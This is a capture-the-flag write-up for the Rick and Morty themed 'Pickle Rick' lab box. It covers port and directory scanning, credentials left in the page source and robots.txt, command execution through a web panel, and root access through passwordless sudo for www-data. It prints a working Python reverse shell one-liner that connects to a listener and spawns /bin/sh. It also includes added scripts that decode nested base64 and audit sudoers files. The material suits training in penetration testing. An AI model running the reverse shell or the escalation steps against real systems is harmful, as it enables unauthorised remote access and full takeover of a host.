Pickle Rick

Last updated 2 years ago

A Rick and Morty CTF. Help turn Rick back into a human!

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

1. Reconnaissance

1.1 Nmap

  • Using nmap to find open ports and services. nmap -sC -sV -oN {outputfile} {IP}

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 08:13 EDT
Nmap scan report for 10.10.161.188
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 60:dd:fc:03:86:a4:84:77:2c:4b:30:97:0d:a4:54:42 (RSA)
|   256 3b:b7:5a:17:1a:66:36:79:4c:3f:5d:88:7c:f6:c5:65 (ECDSA)
|_  256 1c:6a:00:90:ef:aa:43:fb:93:a1:36:6d:1e:d1:f8:a5 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds

We find port 22 (SSH) and port 80 (HTTP) open.

1.2 Gobuster

Using gobuster to brute-force web directories: gobuster dir -u http://{ip} -w {wordlist} -o {outputfile} -x php,txt,html,css,js

/index.html           (Status: 200) [Size: 1062]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 315] [--> http://10.10.161.188/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/robots.txt           (Status: 200) [Size: 17]

1.3 Website

Upon navigating to the website,

  • Inspecting the source code, we see the comment:

`Note to self, remember username!`

> Username: R1ckRul3s

Directories

Checking out the directories we got from Gobuster:

/assets

  • fail.gif

  • picklerick.gif

  • portal.jpg

  • rickandmorty.jpeg

Nothing is hidden in the images.

/robots.txt

Wubbalubbadubdub

2. Gaining Access

2.1 /login.php

Using the username we got previously and hoping that the random gibberish from robots.txt might be the password:

Username: R1ckRul3s  Password: Wubbalubbadubdub

...and we're in.

2.2 /portal.php (redirected to, after login)

We see a command panel right after login. Convenient, huh?

  • Inspecting the source code, we see

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== which is a RABBIT HOLE (literally! Keep base64-decoding it and you'll get the text "RABBIT HOLE").
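The rabbit hole above can be checked mechanically instead of pasting into a decoder layer by layer. The script below is an added example, not code from the original writeup: it peels nested base64 until the current value is no longer valid base64 or no longer decodes to readable text, and it tolerates the mangled "=" padding that copied strings like the one above tend to carry. PORTAL_BLOB is the string from this page; the other inputs and all function names are constructed for the example.

```python
import base64
import binascii


def _normalise_padding(text):
    """Strip any '=' padding and re-pad to a multiple of four.

    Copied CTF strings often arrive with broken padding (e.g. "...QT0==" where
    the encoded layer already ended in '='); re-padding lets the decoder accept
    the payload characters exactly as they are. Line breaks are removed, but
    spaces are kept so that plain text such as "RABBIT HOLE" is not mistaken
    for base64.
    """
    body = text.replace("\r", "").replace("\n", "").strip().rstrip("=")
    return body + "=" * (-len(body) % 4)


def _try_decode(text):
    """Return the decoded bytes if `text` is strictly valid base64, else None."""
    try:
        return base64.b64decode(_normalise_padding(text), validate=True)
    except (binascii.Error, ValueError):
        return None


def _looks_like_text(data):
    """True if the bytes decode as UTF-8 and contain only printable characters."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def peel_base64(blob, max_depth=64):
    """Repeatedly base64-decode `blob`; return (innermost_text, layers_removed).

    Decoding stops when the current value is not valid base64, when it decodes
    to something that is not readable text (a word like "Wubbalubbadubdub" is
    syntactically valid base64 but decodes to binary junk), or at max_depth.
    """
    current = blob.strip()
    depth = 0
    while depth < max_depth:
        decoded = _try_decode(current)
        if not decoded or not _looks_like_text(decoded):
            break
        current = decoded.decode("utf-8")
        depth += 1
    return current, depth


def wrap_base64(text, layers):
    """Nest `text` in `layers` rounds of base64 (used to build sample input)."""
    current = text
    for _ in range(layers):
        current = base64.b64encode(current.encode("utf-8")).decode("ascii")
    return current


# The string found in the portal.php source, copied from the writeup above.
PORTAL_BLOB = (
    "Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0=="
)

if __name__ == "__main__":
    inner, layers = peel_base64(PORTAL_BLOB)
    print(f"{layers} layers removed -> {inner!r}")
```

The readable-text check is what keeps the loop from over-decoding: the robots.txt value is a legitimate stopping point even though it is 16 alphanumeric characters and therefore passes a purely syntactic base64 test.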

Upon further inspection, we are denied permission to all the other pages, with a message about the real Rick.

  • Running ls on the command panel

  • cat cannot run since it is disabled (well, there goes our convenience)

WORKAROUND (thank you, JOHN HAMMOND): using grep . (to grep for every line in a specific file) we find:

  • Sup3rS3cretPickl3Ingred.txt

1st ingredient: xx. xxxxxxx xxxx

  • Clue.txt: Look around the file system for the other ingredient

2.3 Reverse Shell

We can try a reverse shell to get a more stable connection since navigating the file system through the given command panel can be cumbersome.

  • netcat reverse shell not working.

  • Python3 found (which python3)

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(Change the IP and port to your listener.)

  • The second ingredient can be found in /home/rick/second ingredients

    2nd ingredient: x xxxxx xxxx

3 Privilege Escalation

  • Running sudo -l, we find that www-data can run commands as root without a password, so sudo bash gives root access. We find the third ingredient file, /root/3rd.txt.

    3rd ingredient: xxxxx xxxxx
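The root cause of this escalation is a sudoers rule granting the web server account passwordless sudo. As an added defender-side example (not part of the original writeup), the script below audits a sudoers file for NOPASSWD rules and marks those held by service accounts or granting unrestricted commands. The sudoers fragment, the SERVICE_ACCOUNTS list and all function names are constructed for the example; the www-data line mirrors the kind of rule this writeup relies on.

```python
import re

# Accounts that should never hold passwordless sudo on a web server.
# This list is an assumption for the example; tune it to the host's service users.
SERVICE_ACCOUNTS = frozenset({"www-data", "apache", "nginx", "nobody"})

# Constructed sudoers fragment for the example (not taken from the box).
SAMPLE_SUDOERS = "\n".join([
    "Defaults env_reset",
    'Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"',
    "root    ALL=(ALL:ALL) ALL",
    "%sudo   ALL=(ALL:ALL) ALL",
    "# www-data ALL=(ALL) NOPASSWD: ALL   <- commented out, must not be flagged",
    "www-data ALL=(ALL) NOPASSWD: ALL",
    "backup  ALL=(root) NOPASSWD: /usr/bin/rsync",
    "deploy  ALL=(root) /usr/bin/systemctl restart app",
])

# One-line user specification:  who  host = (runas) [TAG:]... commands
_RULE = re.compile(
    r"^(?P<who>[^\s=#]+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)
# Leading tag list such as "NOPASSWD: NOEXEC: " (a tag may also abut the command).
_TAG_PREFIX = re.compile(r"^((?:[A-Z_]+:\s*)+)(.*)$")
_SKIP_KEYWORDS = {"Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias"}


def parse_sudoers(text):
    """Yield (line_no, who, host, runas, spec) for each user specification.

    Comments, blank lines, Defaults and alias lines are skipped. Only the
    simple one-line form is handled; @include and line continuations are not.
    """
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.split()[0] in _SKIP_KEYWORDS:
            continue
        m = _RULE.match(line)
        if m is None:
            continue
        yield line_no, m.group("who"), m.group("host"), m.group("runas"), m.group("spec").strip()


def split_tags(spec):
    """Separate leading tags from the command list: 'NOPASSWD: ALL' -> (['NOPASSWD'], 'ALL')."""
    m = _TAG_PREFIX.match(spec)
    if m is None:
        return [], spec.strip()
    tags = [t for t in m.group(1).replace(" ", "").split(":") if t]
    return tags, m.group(2).strip()


def find_passwordless_sudo(text, service_accounts=SERVICE_ACCOUNTS):
    """Return every NOPASSWD rule for a user (group rules are skipped) with risk flags."""
    findings = []
    for line_no, who, host, runas, spec in parse_sudoers(text):
        if who.startswith("%"):
            continue
        tags, commands = split_tags(spec)
        if "NOPASSWD" not in tags:
            continue
        findings.append({
            "line": line_no,
            "user": who,
            "runas": runas or "root",          # sudoers runs as root when no runas is given
            "commands": commands,
            "unrestricted": commands == "ALL",
            "service_account": who in service_accounts,
        })
    return findings


if __name__ == "__main__":
    for f in find_passwordless_sudo(SAMPLE_SUDOERS):
        level = "CRITICAL" if f["service_account"] and f["unrestricted"] else "review"
        print(f"[{level}] line {f['line']}: {f['user']} -> ({f['runas']}) {f['commands']}")
```

Run against a real host with `sudo cat /etc/sudoers` piped into find_passwordless_sudo (and the files under /etc/sudoers.d, which this parser does not follow); the www-data line is the one that turns a web shell into root without any further exploit.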

Python reverse shell from pentest monkey, with netcat listening on the attacker's machine and the command run in the command panel.

Stabilizing the reverse shell using python3 pty (not required for now, but a cool trick).